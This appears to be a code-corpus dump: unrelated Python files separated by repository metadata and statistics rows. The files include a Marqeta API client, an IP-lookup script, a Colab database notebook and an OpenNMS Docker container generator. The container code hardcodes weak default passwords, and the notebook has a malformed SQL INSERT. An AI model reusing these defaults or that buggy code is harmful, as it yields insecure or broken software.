return render_template('about.html') | 17.647059 | 42 | 0.703333 | 45 | 300 | 4.555556 | 0.555556 | 0.078049 | 0.126829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173333 | 300 | 17 | 43 | 17.647059 | 0.826613 | 0.323333 | 0 | 0 | 0 | 0 | 0.130653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0.25 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
81d5634a2259287c2750b2a915db2f6699799f39 | 4,531 | py | Python | marqeta/resources/velocity_controls.py | marqeta/marqeta-python | 66fa690eb910825c510a391720b0fe717fac0234 | [
"MIT"
] | 21 | 2019-04-12T09:02:17.000Z | 2022-02-18T11:39:06.000Z | marqeta/resources/velocity_controls.py | marqeta/marqeta-python | 66fa690eb910825c510a391720b0fe717fac0234 | [
"MIT"
] | 1 | 2020-07-22T21:27:40.000Z | 2020-07-23T17:38:43.000Z | marqeta/resources/velocity_controls.py | marqeta/marqeta-python | 66fa690eb910825c510a391720b0fe717fac0234 | [
"MIT"
] | 10 | 2019-05-08T14:20:37.000Z | 2021-09-20T18:09:26.000Z |
'''VELOCITYCONTROLS RESOURCE WITH CRU PARAMETERS'''
from marqeta.resources.collection import Collection
from marqeta.response_models.velocity_control_response import VelocityControlResponse
class VelocityControlsCollection(object):
'''
Marqeta API 'velocitycontrols' endpoint list, create, find and update operations
'''
_endpoint = 'velocitycontrols'
def __init__(self, client):
'''
Creates a client collection object
:param client: client object
'''
self.client = client
self.collections = Collection(self.client, VelocityControlResponse)
def page(self, count=5, start_index=0, params=None):
'''
Provides the requested page for velocitycontrols
:param count: data to be displayed per page
:param start_index: start_index
:param params: query parameters
:return: requested page with VelocityControlResponse object for the requested
page 'data'field
'''
return self.collections.page(endpoint=self._endpoint, count=count, start_index=start_index, query_params=params)
def page_available_for_user(self, token, count=5, start_index=0, params=None):
'''
Provides the requested page for velocitycontrols
:param token: user token
:param count: data to be displayed per page
:param start_index: start_index
:param params: query parameters
:return: requested page with VelocityControlResponse object for the requested
page 'data'field
'''
return self.collections.page(endpoint=self._endpoint + '/user/{}/available'.format(token),
count=count, start_index=start_index, query_params=params)
def stream(self, params=None):
'''
Stream through the list of requested endpoint data field
:param params: query parameters
:return: VelocityControlResponse object
'''
return self.collections.stream(endpoint=self._endpoint, query_params=params)
def stream_available_for_user(self, token, params=None):
'''
Stream through the list of requested endpoint data field
:param token: user token
:param params: query parameters
:return: VelocityControlResponse object
'''
return self.collections.stream(endpoint=self._endpoint + '/user/{}/available'.format(token),
query_params=params)
def list(self, params=None, limit=None):
'''
List all the velocitycontrols
:param params: query parameters
:param limit: parameter to limit the list count
:return: List of VelocityControlResponse object
'''
return self.collections.list(endpoint=self._endpoint, query_params=params, limit=limit)
def list_available_for_user(self, token, params=None, limit=None):
'''
List the velocitycontrols available for the given user
:param token: user token
:param params: query parameters
:return: VelocityControlResponse object
'''
return self.collections.list(endpoint=self._endpoint + '/user/{}/available'.format(token),
query_params=params, limit=limit)
def create(self, data, params=None):
'''
Creates a velocitycontrols object
:param data: data required for creation
:param params: query parameters
:return: VelocityControlResponse object of the created velocitycontrols
'''
return self.collections.create(endpoint=self._endpoint, query_params=params, data=data)
def find(self, token, params=None):
'''
Finds the existing velocitycontrols
:param token: velocitycontrols token to find
:param params: query parameters
:return: VelocityControlResponse object
'''
return self.collections.find(endpoint=self._endpoint + '/{}'.format(token),
query_params=params)
def save(self, token, data):
'''
Updates the existing velocitycontrols data
:param token: velocitycontrols token to update
:param data: data to be updated
:return: VelocityControlResponse object of the updated velocitycontrols
'''
return self.collections.save(data, endpoint=self._endpoint + '/{}'.format(token))
def __repr__(self):
return '<Marqeta.resources.velocity_controls.VelocityControlsCollection>'
| 43.990291 | 120 | 0.659457 | 474 | 4,531 | 6.200422 | 0.158228 | 0.051038 | 0.064308 | 0.070772 | 0.654304 | 0.58081 | 0.536237 | 0.4869 | 0.4869 | 0.460361 | 0 | 0.001191 | 0.258883 | 4,531 | 102 | 121 | 44.421569 | 0.874032 | 0.406753 | 0 | 0.064516 | 0 | 0 | 0.06425 | 0.029371 | 0 | 0 | 0 | 0 | 0 | 1 | 0.354839 | false | 0 | 0.064516 | 0.032258 | 0.806452 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
81d98138bcb490cbe03c73366c97626ca649f230 | 215 | py | Python | my-ip-address.py | slunart/PythonScripts | f56ccccc513283c21522d7042dfcdd6ebca2702f | [
"MIT"
] | null | null | null | my-ip-address.py | slunart/PythonScripts | f56ccccc513283c21522d7042dfcdd6ebca2702f | [
"MIT"
] | null | null | null | my-ip-address.py | slunart/PythonScripts | f56ccccc513283c21522d7042dfcdd6ebca2702f | [
"MIT"
] | null | null | null | # Script to show your public ip
# Author: Samuel Martins <samuel@samuelmartins.com.br>
# MIT License
from requests import get
ip = get('https://api.ipify.org').text
print('My public IP address is: ' + ip)
| 23.888889 | 55 | 0.693023 | 33 | 215 | 4.515152 | 0.818182 | 0.107383 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186047 | 215 | 8 | 56 | 26.875 | 0.851429 | 0.437209 | 0 | 0 | 0 | 0 | 0.422018 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
81e5cfe5737a1d94935c43c37b5b32520793f73a | 816 | py | Python | scripts/pughpore/randomwalk/plot_filter.py | jhwnkim/nanopores | 98b3dbb5d36464fbdc03f59d224d38e4255324ce | [
"MIT"
] | 8 | 2016-09-07T01:59:31.000Z | 2021-03-06T12:14:31.000Z | scripts/pughpore/randomwalk/plot_filter.py | jhwnkim/nanopores | 98b3dbb5d36464fbdc03f59d224d38e4255324ce | [
"MIT"
] | null | null | null | scripts/pughpore/randomwalk/plot_filter.py | jhwnkim/nanopores | 98b3dbb5d36464fbdc03f59d224d38e4255324ce | [
"MIT"
] | 4 | 2017-12-06T17:43:01.000Z | 2020-05-01T05:41:14.000Z | import os
import sys
start = int(sys.argv[2])
fieldsname = sys.argv[1]
import nanopores as nano
import nanopores.geometries.pughpore as pughpore
geop = nano.Params(pughpore.params)
hpore = geop.hpore
import os
HOME = os.path.expanduser("~")
PAPERDIR = os.path.join(HOME, "papers", "paper-howorka")
FIGDIR = os.path.join(PAPERDIR, "figures", "")
DATADIR = os.path.join(HOME,"Dropbox", "nanopores", "fields")
import nanopores.tools.fields as fields
fields.set_dir(DATADIR)
params=dict(avgbind1=23e6,avgbind2=3e4,P_bind1=0.035,P_bind2=3e-1,z0=hpore/2.+0.)
data=fields.get_fields(fieldsname,**params)
samples=len(data["a"])
from create_plot_filter import save_fig_filter
#for i in [start]:
for i in range(start,samples):
print '%i out of %i' %(i,samples)
save_fig_filter(params,fieldsname,i)
fields.update()
| 28.137931 | 81 | 0.745098 | 130 | 816 | 4.6 | 0.492308 | 0.040134 | 0.050167 | 0.046823 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027322 | 0.102941 | 816 | 28 | 82 | 29.142857 | 0.789617 | 0.020833 | 0 | 0.086957 | 0 | 0 | 0.077694 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.304348 | null | null | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
c490105031241616af96544f2f0d06147e74634a | 2,598 | py | Python | module2-sql-for-analysis/assignment_2_postgresql.py | ash827/DS-Unit-3-Sprint-2-SQL-and-Databases | 7538d0264b93256c980ae11097f73893bf64fdc0 | [
"MIT"
] | null | null | null | module2-sql-for-analysis/assignment_2_postgresql.py | ash827/DS-Unit-3-Sprint-2-SQL-and-Databases | 7538d0264b93256c980ae11097f73893bf64fdc0 | [
"MIT"
] | null | null | null | module2-sql-for-analysis/assignment_2_postgresql.py | ash827/DS-Unit-3-Sprint-2-SQL-and-Databases | 7538d0264b93256c980ae11097f73893bf64fdc0 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Assignment 2 PostgreSQL.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1RaFLSTAwoZ8IeLg27YQqhnMe-g3Vtt4m
POSTGRES DEMO
"""
!pip install psycopg2-binary
import psycopg2
import os
from dotenv import load_dotenv
load_dotenv()
"""1. Establish connection
2. Cursor
3. Execute query
4. Get RESULTS!
"""
DB_HOST = os.getenv("DB_HOST", default="OOPS")
DB_NAME = os.getenv("DB_NAME", default="OOPS")
DB_USER = os.getenv("DB_USER", default="OOPS")
DB_PASSWORD = os.getenv("DB_PASSWORD", default="OOPS")
connection = psycopg2.connect(
dbname=DB_NAME,
user=DB_USER,
password=DB_PASSWORD,
host=DB_HOST
)
cursor = connection.cursor()
cursor.execute('SELECT * from playground;')
results = cursor.fetchall()
print(results)
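The four numbered steps above apply to any DB-API 2.0 driver, not just psycopg2. A minimal sketch of the same connect → cursor → execute → fetch cycle using the stdlib `sqlite3` module (an in-memory database here, so no server or credentials are needed):

```python
import sqlite3

# 1. Establish connection (":memory:" avoids touching disk)
demo_conn = sqlite3.connect(':memory:')

# 2. Cursor
demo_cursor = demo_conn.cursor()

# 3. Execute query
demo_cursor.execute('CREATE TABLE playground (id INTEGER, note TEXT);')
demo_cursor.execute("INSERT INTO playground VALUES (1, 'hello');")

# 4. Get RESULTS!
demo_cursor.execute('SELECT * FROM playground;')
demo_results = demo_cursor.fetchall()
print(demo_results)  # [(1, 'hello')]
```

The psycopg2 code above follows the identical shape; only the connection arguments differ.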
"""##Working with the rpg database"""
import sqlite3
import pandas as pd
conn = sqlite3.connect('rpg_db (1).sqlite3')
sl_cursor = conn.cursor()
count = sl_cursor.execute('SELECT COUNT(*) FROM charactercreator_character;').fetchall()
count
characters = sl_cursor.execute('SELECT * FROM charactercreator_character').fetchall()
characters
#This shows us the schema
sl_cursor.execute('PRAGMA table_info(charactercreator_character);').fetchall()
create_character_table = '''
CREATE TABLE character_table (
character_id SERIAL PRIMARY KEY,
name VARCHAR(100),
level INT,
exp INT,
hp INT,
strength INT,
intelligence INT,
dexterity INT,
wisdom INT
);
'''
pg_cursor = connection.cursor()  # reuse the PostgreSQL connection from above
pg_cursor.execute(create_character_table)
# The closing quote belongs after the name, not at the end of the value list
pg_cursor.execute("INSERT INTO character_table VALUES (1, 'Aliquid iste optio reiciendi', 0, 0, 10, 1, 1, 1, 1);")
for character in characters:
    print("INSERT INTO character_table VALUES " + str(character) + ';')
"""#Titanic Data for Assignment"""
# Colab shell command (not valid Python in a plain .py file):
# !wget 'https://raw.githubusercontent.com/ash827/DS-Unit-3-Sprint-2-SQL-and-Databases/master/module2-sql-for-analysis/titanic.csv'
import pandas as pd
df_titanic = pd.read_csv('https://raw.githubusercontent.com/ash827/DS-Unit-3-Sprint-2-SQL-and-Databases/master/module2-sql-for-analysis/titanic.csv')
df_titanic.shape
df_titanic.columns.tolist()
df_titanic = df_titanic.reindex(columns = ['Name', 'Age', 'Sex', 'Pclass', 'Fare', 'Siblings/Spouses Aboard', 'Parents/Children Aboard', 'Survived'])
#The columns are now in a nice order :)
"""##Using sqlite3 with the Titanic data
#Having trouble getting the titanic information to load as a db?
"""
# A .csv file is not a SQLite database; write the DataFrame into one first
conn = sqlite3.connect('titanic.sqlite3')
df_titanic.to_sql('titanic', conn, index=False, if_exists='replace')
ti_cursor = conn.cursor()
count = ti_cursor.execute('SELECT COUNT(*) FROM titanic;').fetchall()
count
# --- File: bc_health_io/reputation/admin.py
# --- Repo: catedt/bc_health_io (MIT)
from django.contrib import admin
from reputation.models import Reputation
class ReputationAdmin(admin.ModelAdmin):
    fieldsets = [
        ('Reputation', {'fields': ['doctorId', 'email', 'repute', 'createDate', 'updateDate']}),
    ]

admin.site.register(Reputation, ReputationAdmin)
# --- File: scripts/container_generator/container.py
# --- Repo: NETHINKS/opennms-docker-env (MIT)
""" Container module.
This module defines the container definitions for container_generator.
"""
import os
import time
import hashlib
from collections import OrderedDict
from OpenSSL import crypto
from template_engine import TemplateEngine
from docker import DockerImage
from docker import DockerServiceConfig
class Container(object):
"""Abstract definition of a container
This class represents an abstract definition of a container. It should not
be used directly. Instead a subclass which extends this class should be
used.
Attributes:
container_name: unique name of the container
output_basedir: base directory for output data
Usage:
A subclass of this should at first be initialized with __init__().
The method get_default_parameters() returns all parameters for a
container with default values. After that, the setup_container() method
creates all configuration and files needed for the specific container.
"""
default_parameters = OrderedDict()
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
self._container_name = container_name
self._container_parameters = OrderedDict()
self._container_proxylocations = []
self._container_outputdir = output_basedir + "/init/" + container_name
self._container_imagedir = output_basedir + "/images/"
self._container_imagename = self._container_name + ".tar"
self._container_namedvolumes = []
self._container_config = DockerServiceConfig(container_name)
self._app_config = app_config
# create output directories if not exist
os.makedirs(self._container_outputdir, exist_ok=True)
        # init with a copy of default_parameters, so per-instance edits
        # never mutate the shared class-level defaults
        self._container_parameters = type(self).default_parameters.copy()
def get_name(self):
"""Returns the container name"""
return self._container_name
def get_image_filename(self):
"""Returns the filename for the stored image"""
return "images/" + self._container_imagename
def setup_container(self, parameters):
"""Setup an container
This method must be implemented by a subclass. The following things
should be done in this method:
- setup proxy locations in self._container_proxylocations
- create container config in self._container_config
Args:
parameters: parameters for the container
"""
pass
def get_container_config(self):
"""Return the container config
Return:
The container config as DockerServiceConfig object
"""
return self._container_config
def get_proxy_locations(self):
"""Return all proxy locations that should be created for this one"""
return self._container_proxylocations
def get_named_volumes(self):
"""Return a list with all configured named volumes"""
return self._container_namedvolumes
def download_image(self):
# create image dir if not exist
os.makedirs(self._container_imagedir, exist_ok=True)
image_name = self._container_config.get_image()
output_filename = self._container_imagedir + self._container_imagename
docker_image = DockerImage(image_name)
docker_image.export_image(output_filename)
class OpenNMS(Container):
"""Class for defining a container for OpenNMS
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("database_server", "postgres"),
("database_user", "postgres"),
("database_password", "secret1234"),
("user_admin_password", "admin"),
("user_api_password", "api"),
("cassandra_server", "cassandra"),
("cassandra_user", "cassandra"),
("cassandra_password", "secret1234")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["database_password"] = self._app_config.get_value("authentication", "db_password", "")
self._container_parameters["cassandra_password"] = self._app_config.get_value("authentication", "db_password", "")
self._container_parameters["user_admin_password"] = self._app_config.get_value("authentication", "admin_password", "")
self._container_parameters["user_api_password"] = self._app_config.get_value("authentication", "api_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "OpenNMS",
"location": "/opennms",
"url": "http://opennms:8980"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-opennms:18.0.4-2")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/opennms")
self._container_config.add_buildarg("build_customrepo", "https://opennmsdeploy.nethinks.com/repo/horizon/18.0.4/")
self._container_config.add_buildarg("url_sw_cassandra", "https://opennmsdeploy.nethinks.com/software/cassandra/apache-cassandra-3.0.14-bin.tar.gz")
self._container_config.set_privileged(True)
self._container_config.set_restart_policy("always")
self._container_config.add_environment("INIT_DB_SERVER",
self._container_parameters["database_server"])
self._container_config.add_environment("INIT_DB_USER",
self._container_parameters["database_user"])
self._container_config.add_environment("INIT_DB_PASSWORD",
self._container_parameters["database_password"])
self._container_config.add_environment("INIT_ADMIN_USER", "admin")
self._container_config.add_environment("INIT_ADMIN_PASSWORD",
self._container_parameters["user_admin_password"])
self._container_config.add_environment("INIT_API_USER", "api")
self._container_config.add_environment("INIT_API_PASSWORD",
self._container_parameters["user_api_password"])
self._container_namedvolumes.append("opennms")
self._container_namedvolumes.append("rrd")
self._container_config.add_volume("opennms:/data/container")
self._container_config.add_volume("rrd:/data/rrd")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/opennms:/data/init")
self._container_config.add_port("162/udp:162/udp")
self._container_config.add_port("514/udp:514/udp")
self._container_config.add_port("5817:5817")
self._container_config.add_dependency("postgres")
# check cassandra option and parameters
if self._app_config.get_value_boolean("container", "cassandra"):
self._container_config.add_environment("INIT_CASSANDRA_ENABLE", "true")
self._container_config.add_environment("INIT_CASSANDRA_SERVER",
self._container_parameters["cassandra_server"])
self._container_config.add_environment("INIT_CASSANDRA_USER",
self._container_parameters["cassandra_user"])
self._container_config.add_environment("INIT_CASSANDRA_PASSWORD",
self._container_parameters["cassandra_password"])
self._container_config.add_dependency("cassandra")
class PostgreSQL(Container):
"""Class for defining a container for PostgreSQL
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("database_user", "postgres"),
("database_password", "secret1234")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["database_password"] = self._app_config.get_value("authentication", "db_password", "")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-postgres:9.5.3-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/postgres")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("POSTGRES_USER",
self._container_parameters["database_user"])
self._container_config.add_environment("POSTGRES_PASSWORD",
self._container_parameters["database_password"])
self._container_namedvolumes.append("postgres")
self._container_config.add_volume("postgres:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/postgres:/data/init")
class Cassandra(Container):
"""Class for defining a container for Newts/Cassandra
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("cassandra_user", "cassandra"),
("cassandra_password", "secret1234")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["cassandra_password"] = self._app_config.get_value("authentication", "db_password", "secret1234")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-cassandra:3.0.14-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/cassandra")
self._container_config.add_buildarg("url_sw_cassandra", "https://opennmsdeploy.nethinks.com/software/cassandra/apache-cassandra-3.0.14-bin.tar.gz")
self._container_config.add_buildarg("url_sw_jdk", "https://opennmsdeploy.nethinks.com/software/jdk/jdk-8u112-linux-x64.rpm")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("CASSANDRA_USER",
self._container_parameters["cassandra_user"])
self._container_config.add_environment("CASSANDRA_PASSWORD",
self._container_parameters["cassandra_password"])
self._container_namedvolumes.append("cassandra")
self._container_config.add_volume("cassandra:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/cassandra:/data/init")
class Nginx(Container):
"""Class for defining a container for Nginx
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("ssl_organisation", "NETHINKS GmbH"),
("ssl_unit", "PSS"),
("ssl_country", "DE"),
("ssl_state", "HESSEN"),
("ssl_location", "Fulda"),
("ssl_cn", "localhost"),
("ssl_valid_time_days", "3650"),
("ssl_keylength", "4096"),
("ssl_digest", "sha384")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["ssl_organisation"] = self._app_config.get_value("ssl", "organisation", "")
self._container_parameters["ssl_unit"] = self._app_config.get_value("ssl", "unit", "")
self._container_parameters["ssl_country"] = self._app_config.get_value("ssl", "country", "")
self._container_parameters["ssl_state"] = self._app_config.get_value("ssl", "state", "")
self._container_parameters["ssl_location"] = self._app_config.get_value("ssl", "location", "")
self._container_parameters["ssl_cn"] = self._app_config.get_value("ssl", "cn", "")
self._container_parameters["ssl_valid_time_days"] = self._app_config.get_value("ssl", "valid_time_days", "")
self._container_parameters["ssl_keylength"] = self._app_config.get_value("ssl", "keylength", "")
self._container_parameters["ssl_digest"] = self._app_config.get_value("ssl", "digest", "")
self._container_parameters["support_text"] = self._app_config.get_value("supportinfo", "support_text", "")
self.__proxy_locations = []
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-nginx:1.10.2-2")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/nginx")
self._container_config.set_restart_policy("always")
self._container_config.add_port("80:80")
self._container_config.add_port("443:443")
self._container_namedvolumes.append("nginx")
self._container_config.add_volume("nginx:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/nginx:/data/init")
self._container_config.add_environment("INIT_SSL_CN",
self._container_parameters["ssl_cn"])
self._container_config.add_environment("INIT_SSL_ORG",
self._container_parameters["ssl_organisation"])
self._container_config.add_environment("INIT_SSL_UNIT",
self._container_parameters["ssl_unit"])
self._container_config.add_environment("INIT_SSL_COUNTRY",
self._container_parameters["ssl_country"])
self._container_config.add_environment("INIT_SSL_STATE",
self._container_parameters["ssl_state"])
self._container_config.add_environment("INIT_SSL_LOCATION",
self._container_parameters["ssl_location"])
self._container_config.add_environment("INIT_SSL_VALIDDAYS",
self._container_parameters["ssl_valid_time_days"])
self._container_config.add_environment("INIT_SSL_KEYLENGTH",
self._container_parameters["ssl_keylength"])
self._container_config.add_environment("INIT_SSL_DIGEST",
self._container_parameters["ssl_digest"])
self._container_config.add_environment("CONF_SUPPORTTEXT",
self._container_parameters["support_text"])
        for i, location in enumerate(self.__proxy_locations, start=10):
            location_varname = "CONF_LOCATION_" + str(i)
            location_value = ";".join([location["name"], location["location"], location["url"]])
            self._container_config.add_environment(location_varname, location_value)
def set_proxy_locations(self, proxy_locations):
"""Method for adding proxy locations
This method must be executed before the setup_container() method
"""
self.__proxy_locations.extend(proxy_locations)
class Grafana(Container):
"""Class for defining a container for Grafana
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("admin_password", "admin"),
("opennms_url", "http://opennms:8980/opennms"),
("opennms_username", "admin"),
("opennms_password", "admin")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["admin_password"] = self._app_config.get_value("authentication", "admin_password", "")
self._container_parameters["opennms_username"] = "api"
self._container_parameters["opennms_password"] = self._app_config.get_value("authentication", "api_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "Grafana",
"location": "/grafana/",
"url": "http://grafana:3000/"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-grafana:3.1.1-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/grafana")
self._container_config.add_buildarg("url_sw_grafana", "https://opennmsdeploy.nethinks.com/software/grafana/grafana-3.1.1-1470047149.linux-x64.tar.gz")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("ADMIN_PASSWORD",
self._container_parameters["admin_password"])
self._container_config.add_environment("ONMS_URL",
self._container_parameters["opennms_url"])
self._container_config.add_environment("ONMS_USER",
self._container_parameters["opennms_username"])
self._container_config.add_environment("ONMS_PASSWORD",
self._container_parameters["opennms_password"])
self._container_namedvolumes.append("grafana")
self._container_config.add_volume("grafana:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/grafana:/data/init")
class AlarmForwarder(Container):
"""Class for defining a container for Alarmforwarder
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("admin_password", "admin"),
("opennms_url", "http://opennms:8980/opennms/rest"),
("opennms_username", "admin"),
("opennms_password", "admin"),
("db_server", "postgres"),
("db_name", "alarmforwarder"),
("db_user", "postgres"),
("db_password", "postgres")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["admin_password"] = self._app_config.get_value("authentication", "admin_password", "")
self._container_parameters["opennms_username"] = "api"
self._container_parameters["opennms_password"] = self._app_config.get_value("authentication", "api_password", "")
self._container_parameters["db_password"] = self._app_config.get_value("authentication", "db_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "AlarmForwarder",
"location": "/alarmforwarder/",
"url": "http://alarmforwarder:5000/"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-alarmforwarder:1.0.1-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/alarmforwarder")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("ADMIN_PASSWORD",
self._container_parameters["admin_password"])
self._container_config.add_environment("DB_SERVER",
self._container_parameters["db_server"])
self._container_config.add_environment("DB_NAME",
self._container_parameters["db_name"])
self._container_config.add_environment("DB_USER",
self._container_parameters["db_user"])
self._container_config.add_environment("DB_PASSWORD",
self._container_parameters["db_password"])
self._container_config.add_environment("ONMS_URL",
self._container_parameters["opennms_url"])
self._container_config.add_environment("ONMS_USER",
self._container_parameters["opennms_username"])
self._container_config.add_environment("ONMS_PASSWORD",
self._container_parameters["opennms_password"])
self._container_namedvolumes.append("alarmforwarder")
self._container_config.add_volume("alarmforwarder:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/alarmforwarder:/data/init")
self._container_config.add_dependency("postgres")
class YourDashboard(Container):
"""Class for defining a container for yourDashboard
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("opennms_url", "http://opennms:8980/opennms/rest"),
("opennms_username", "admin"),
("opennms_password", "admin")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["opennms_username"] = "api"
self._container_parameters["opennms_password"] = self._app_config.get_value("authentication", "api_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "yourDashboard",
"location": "/yourdashboard",
"url": "http://yourdashboard"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-yourdashboard:0.3-2")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/yourdashboard")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("INIT_OPENNMS_SERVER", "http://opennms:8980/opennms")
self._container_config.add_environment("INIT_OPENNMS_USER",
self._container_parameters["opennms_username"])
self._container_config.add_environment("INIT_OPENNMS_PASSWORD",
self._container_parameters["opennms_password"])
self._container_namedvolumes.append("yourdashboard")
self._container_config.add_volume("yourdashboard:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/yourdashboard:/data/init")
class Pris(Container):
"""Class for defining a container for PRIS
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-pris:1.1.5-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/pris")
self._container_config.add_buildarg("url_sw_pris", "https://opennmsdeploy.nethinks.com/software/pris/opennms-pris-dist-1.1.5-release-archive.tar.gz")
self._container_config.add_buildarg("url_sw_jdk", "https://opennmsdeploy.nethinks.com/software/jdk/jdk-8u112-linux-x64.rpm")
self._container_config.set_restart_policy("always")
self._container_namedvolumes.append("pris")
self._container_config.add_volume("pris:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/pris:/data/init")
class IPv6Helper(Container):
"""Class for defining a container for IPv6Helper
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("ip6net", "fd00:1::/48"),
("bridge_interface", "onmsenv0")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["ip6net"] = self._app_config.get_value("network", "ipv6_internal_net", "")
self._container_parameters["bridge_interface"] = self._app_config.get_value("network", "bridge_interface_name", "")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-ipv6helper:1.0.0-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/ipv6helper")
self._container_config.set_restart_policy("always")
self._container_config.set_privileged(True)
self._container_config.set_network_mode("host")
self._container_config.add_environment("CONF_IP6NET",
self._container_parameters["ip6net"])
self._container_config.add_environment("CONF_BRIDGE_INTERFACE",
self._container_parameters["bridge_interface"])
self._container_config.add_volume("/lib/modules:/lib/modules:ro")
class Management(Container):
"""Class for defining a container for management access
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("ssh_password", "admin"),
("backup_enabled", "False"),
("backup_url", "smb://username:password@1.2.3.4/backup/test"),
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["ssh_password"] = self._app_config.get_value("authentication", "admin_password", "")
